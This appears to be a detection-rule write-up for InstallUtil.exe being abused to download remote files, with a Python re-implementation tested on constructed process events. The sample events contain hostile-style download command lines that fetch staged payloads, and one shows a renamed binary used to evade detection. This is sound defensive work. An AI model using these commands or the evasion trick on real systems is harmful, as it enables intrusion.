
Summary
This detection rule flags executions of the .NET Framework's InstallUtil.exe whose command line contains a remote URL (http://, https:// or ftp://), which indicates an attempt to use the utility to download arbitrary files from a remote location. InstallUtil.exe is identified either by its image path or by its PE original filename, so a copy that has been renamed to disguise itself is still matched. Files fetched this way are written to the user's INetCache directory (under %LOCALAPPDATA%\Microsoft\Windows\INetCache), which is where a responder should look for the retrieved payload. The behaviour is significant because InstallUtil.exe is a Microsoft-signed binary that attackers use as a proxy to run their own .NET code, performing actions such as downloading files while evading application control and detection. Legitimate software installations may also invoke InstallUtil.exe, so a match should be investigated (the URL's destination, the parent process and the downloaded file in INetCache) before being treated as malicious.
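As an added example (not the rule's own definition), the following Python reproduces the rule's two conditions and runs them over constructed Sysmon-style process-creation events: a direct download, a renamed copy of InstallUtil.exe that only the original-filename clause catches, a benign local install that must not match, and an unrelated downloader. The event field names, paths and URLs are assumed for illustration.

```python
"""Re-implementation of the InstallUtil.exe download detection over sample events.

Added example, not the rule's own source. Events are constructed; the URLs use
documentation address space and the paths are assumptions.
"""
from dataclasses import dataclass
from typing import Iterable, List

# Protocol markers the rule looks for in the command line (Sigma 'contains' is
# case-insensitive, so we lower-case the command line before checking).
PROTOCOL_MARKERS = ("http://", "https://", "ftp://")


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 / process-creation record."""
    image: str               # full path of the started executable
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str


def is_installutil(event: ProcessEvent) -> bool:
    """Match on the on-disk name OR the PE original filename.

    The second clause is what catches a copy renamed to e.g. svchost.exe:
    renaming the file does not change the version resource inside it.
    """
    return (event.image.lower().endswith("\\installutil.exe")
            or event.original_file_name.lower() == "installutil.exe")


def has_remote_url(command_line: str) -> bool:
    """True if the command line carries an http/https/ftp URL."""
    lowered = command_line.lower()
    return any(marker in lowered for marker in PROTOCOL_MARKERS)


def matches_rule(event: ProcessEvent) -> bool:
    """Both selections must hold, as in the rule's condition."""
    return is_installutil(event) and has_remote_url(event.command_line)


def run_detection(events: Iterable[ProcessEvent]) -> List[ProcessEvent]:
    """Return the events that trip the rule."""
    return [e for e in events if matches_rule(e)]


# Constructed sample events (assumed paths, documentation-range IPs).
SAMPLE_EVENTS = [
    # 1. Direct abuse: genuine InstallUtil.exe handed a remote URL -> match.
    ProcessEvent(
        image=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
        original_file_name="InstallUtil.exe",
        command_line="InstallUtil.exe https://203.0.113.10/stage1.dll",
    ),
    # 2. Renamed copy: image name disguised, OriginalFileName intact,
    #    upper-case scheme to exercise case-insensitive matching -> match.
    ProcessEvent(
        image=r"C:\Users\Public\svchost.exe",
        original_file_name="InstallUtil.exe",
        command_line="svchost.exe HTTP://198.51.100.7/stage2",
    ),
    # 3. Benign local install of a service assembly, no URL -> no match.
    ProcessEvent(
        image=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
        original_file_name="InstallUtil.exe",
        command_line=r'InstallUtil.exe /LogToConsole=false "C:\Program Files\Vendor\Service.exe"',
    ),
    # 4. Another tool downloading from a URL: not InstallUtil -> no match.
    ProcessEvent(
        image=r"C:\Windows\System32\curl.exe",
        original_file_name="curl.exe",
        command_line="curl.exe -o out.bin https://203.0.113.10/stage1.dll",
    ),
]


if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print(f"ALERT image={hit.image} cmd={hit.command_line}")
```

Event 2 is the reason the rule keys on OriginalFileName as well as the image path; a detection that only checked the path would miss it. Event 3 is the expected false-positive shape: same binary, but a local assembly rather than a URL, so the download selection does not fire.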
Categories
- Endpoint
- Windows
Data Sources
- Process
Created: 2022-08-19